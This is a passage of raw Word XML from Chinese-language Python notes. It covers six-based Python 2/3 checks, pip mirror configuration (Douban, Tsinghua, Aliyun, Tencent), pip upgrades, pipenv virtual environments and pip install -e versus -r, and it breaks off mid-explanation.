      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import six</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E79AD0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>six.PY2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>six.PY3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其值是直接返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来进行判断的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF0E6D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D40658" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="396" w:name="_Toc159779847"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何兼容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="396"/>
    </w:p>
    <w:p w14:paraId="010421B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="168DD806" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://lucumr.pocoo.org/2011/1/22/forwards-compatible-python/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA52BA8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>尚未研究</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D88AA55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F1A452" w14:textId="2B4F29F3" w:rsidR="00CB4E41" w:rsidRDefault="00CB4E41" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="397" w:name="_Toc159779848"/>
      <w:r>
        <w:t>pip</w:t>
      </w:r>
      <w:bookmarkEnd w:id="397"/>
    </w:p>
    <w:p w14:paraId="25E8820E" w14:textId="77777777" w:rsidR="00CB4E41" w:rsidRDefault="00CB4E41" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="792D8535" w14:textId="77F647EA" w:rsidR="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="398" w:name="_Toc159779849"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>换源</w:t>
      </w:r>
      <w:bookmarkEnd w:id="398"/>
    </w:p>
    <w:p w14:paraId="06B8FB53" w14:textId="47D7D6C9" w:rsidR="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>永久修改源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00206A80" w14:textId="77777777" w:rsidR="00CB2A6C" w:rsidRDefault="00CB2A6C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A24DA5" w14:textId="77777777" w:rsidR="00CB2A6C" w:rsidRDefault="00CB2A6C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2A6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>～</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2A6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/.pip/pip.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B89A608" w14:textId="77777777" w:rsidR="00CB2A6C" w:rsidRPr="00CB2A6C" w:rsidRDefault="00CB2A6C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB2A6C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[global]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB36921" w14:textId="77777777" w:rsidR="00CB2A6C" w:rsidRPr="00CB2A6C" w:rsidRDefault="00CB2A6C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB2A6C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>index-url=http://pypi.douban.com/simple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD50A3A" w14:textId="77777777" w:rsidR="00CB2A6C" w:rsidRPr="00CB2A6C" w:rsidRDefault="00CB2A6C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB2A6C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[install]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF63AFF" w14:textId="77777777" w:rsidR="00CB2A6C" w:rsidRDefault="00CB2A6C" w:rsidP="009222EB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB2A6C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>trusted-host=pypi.douban.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454B9859" w14:textId="77777777" w:rsidR="00CB2A6C" w:rsidRDefault="00CB2A6C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="508625E6" w14:textId="018E509C" w:rsidR="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清华源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4568DB0C" w14:textId="77777777" w:rsidR="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pip config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A823D0" w14:textId="77777777" w:rsidR="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阿里源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6772D533" w14:textId="77777777" w:rsidR="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pip config set global.index-url https://mirrors.aliyun.com/pypi/simple/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6A0249" w14:textId="77777777" w:rsidR="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>腾讯源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE66E8D" w14:textId="77777777" w:rsidR="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pip config set global.index-url http://mirrors.cloud.tencent.com/pypi/simple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2C14BA" w14:textId="77777777" w:rsidR="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>豆瓣源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0439105F" w14:textId="39240700" w:rsidR="00340024" w:rsidRPr="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pip config set global.index-url http://pypi.douban.com/simple/# </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>换回默认源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pip config unset global.index-url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3028D941" w14:textId="77777777" w:rsidR="00CB2A6C" w:rsidRDefault="00CB2A6C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B4F57F6" w14:textId="77777777" w:rsidR="00CB2A6C" w:rsidRDefault="00CB2A6C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D449C0D" w14:textId="791BA9C8" w:rsidR="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>临时指定源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABD3E3C" w14:textId="77777777" w:rsidR="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="167C2998" w14:textId="77777777" w:rsidR="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包，这里使用的是豆瓣源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB24A68" w14:textId="34547054" w:rsidR="00340024" w:rsidRPr="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00340024">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pip install django -i http://pypi.douban.com/simple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563FBE9B" w14:textId="77777777" w:rsidR="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50902E37" w14:textId="765CF0A2" w:rsidR="00CB4E41" w:rsidRDefault="00CB4E41" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="399" w:name="_Toc159779850"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新</w:t>
      </w:r>
      <w:bookmarkEnd w:id="399"/>
    </w:p>
    <w:p w14:paraId="18A34061" w14:textId="56A3CED9" w:rsidR="00CB4E41" w:rsidRDefault="00CB4E41" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB4E41">
        <w:t>python -m pip install --upgrade pip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7694C2" w14:textId="39A58BB2" w:rsidR="00CB4E41" w:rsidRDefault="00CD27F8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD27F8">
        <w:lastRenderedPageBreak/>
        <w:t>djangorestframework-simplejwt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的无法引入问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6C72D3" w14:textId="13F1A478" w:rsidR="00CB4E41" w:rsidRDefault="00CD27F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD27F8">
        <w:t>python3 -m pip install --upgrade djangorestframework-simplejwt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D356DC7" w14:textId="77777777" w:rsidR="00CB4E41" w:rsidRDefault="00CB4E41" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="107F67A8" w14:textId="77777777" w:rsidR="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76772664" w14:textId="775B2589" w:rsidR="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="400" w:name="_Toc159779851"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pipfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：虚拟环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="400"/>
    </w:p>
    <w:p w14:paraId="1E56AC51" w14:textId="77777777" w:rsidR="000D3BC8" w:rsidRDefault="000D3BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="493E1458" w14:textId="408D34D5" w:rsidR="000D3BC8" w:rsidRDefault="000D3BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="000D3BC8">
        <w:t>https://blog.csdn.net/lch551218/article/details/104052993</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C94C41" w14:textId="77777777" w:rsidR="000D3BC8" w:rsidRPr="000D3BC8" w:rsidRDefault="000D3BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61BBE2FB" w14:textId="69EDA5F3" w:rsidR="00340024" w:rsidRDefault="000D3BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000D3BC8">
        <w:t>pip install pipenv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7896F8F9" w14:textId="70562A4D" w:rsidR="000D3BC8" w:rsidRDefault="000D3BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000D3BC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳转到项目文件夹打开</w:t>
      </w:r>
      <w:r w:rsidRPr="000D3BC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="000D3BC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>窗口并输入以下代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1C9C08" w14:textId="6BBDD6AF" w:rsidR="000D3BC8" w:rsidRDefault="000D3BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000D3BC8">
        <w:t>pipenv install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0C0426" w14:textId="1613E1A1" w:rsidR="000D3BC8" w:rsidRDefault="000D3BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000D3BC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为虚拟环境安装指定包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AC78E8" w14:textId="06CF5E86" w:rsidR="000D3BC8" w:rsidRDefault="000D3BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000D3BC8">
        <w:t>pipenv install numpy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ABD42B" w14:textId="77777777" w:rsidR="000D3BC8" w:rsidRDefault="000D3BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246E2007" w14:textId="732D117D" w:rsidR="000D3BC8" w:rsidRDefault="000D3BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果使用默认安装源，大多数情况下会卡在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>locking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阶段，解决办法有二</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCF65B7" w14:textId="77777777" w:rsidR="000D3BC8" w:rsidRDefault="000D3BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改安装源，修改项目文件夹下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pipfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> url </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后边的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D144C7C" w14:textId="427DE7A9" w:rsidR="000D3BC8" w:rsidRDefault="000D3BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">skip-lock </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数跳过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325E9624" w14:textId="77777777" w:rsidR="000D3BC8" w:rsidRDefault="000D3BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7087DABB" w14:textId="3021E78B" w:rsidR="000D3BC8" w:rsidRDefault="000D3BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000D3BC8">
        <w:t>pipenv shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADB7B15" w14:textId="77777777" w:rsidR="000D3BC8" w:rsidRDefault="000D3BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43CA753B" w14:textId="77777777" w:rsidR="00340024" w:rsidRDefault="00340024" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3864071D" w14:textId="6A364B1D" w:rsidR="00595E8B" w:rsidRDefault="00595E8B" w:rsidP="00595E8B">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> install -e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>pip install -r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B283E7B" w14:textId="77777777" w:rsidR="00595E8B" w:rsidRDefault="00595E8B" w:rsidP="00595E8B"/>
    <w:p w14:paraId="374A1CDF" w14:textId="2B48E8DB" w:rsidR="00595E8B" w:rsidRDefault="00595E8B" w:rsidP="00595E8B">
      <w:r w:rsidRPr="00595E8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install -r requirements.txt </w:t>
      </w:r>
      <w:r w:rsidRPr="00595E8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是另一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00595E8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> pip </w:t>
      </w:r>
      <w:r w:rsidRPr="00595E8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，用于从一个指定的文本文件中安装依赖包。这个文本文件通常称为</w:t>
      </w:r>
      <w:r w:rsidRPr="00595E8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> requirements </w:t>
      </w:r>
      <w:r w:rsidRPr="00595E8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，通常命名为</w:t>
      </w:r>
      <w:r w:rsidRPr="00595E8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> requirements.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00595E8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这个文件中列出了项目依赖的所有软件包及其版本信息，每行一个软件包，并且可以指定特定版本号或版本范围。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB3E696" w14:textId="77777777" w:rsidR="00595E8B" w:rsidRPr="00595E8B" w:rsidRDefault="00595E8B" w:rsidP="00595E8B"/>
    <w:p w14:paraId="3AEF8FE8" w14:textId="77777777" w:rsidR="00595E8B" w:rsidRDefault="00595E8B" w:rsidP="00595E8B">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区别在于：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1370971E" w14:textId="77777777" w:rsidR="00595E8B" w:rsidRDefault="00595E8B" w:rsidP="00595E8B">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61621996" w14:textId="292BFB39" w:rsidR="00595E8B" w:rsidRDefault="00595E8B" w:rsidP="00595E8B">
      <w:pPr>
        <w:ind w:firstLine="195"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install -e . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装当前项目，并使用该项目中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
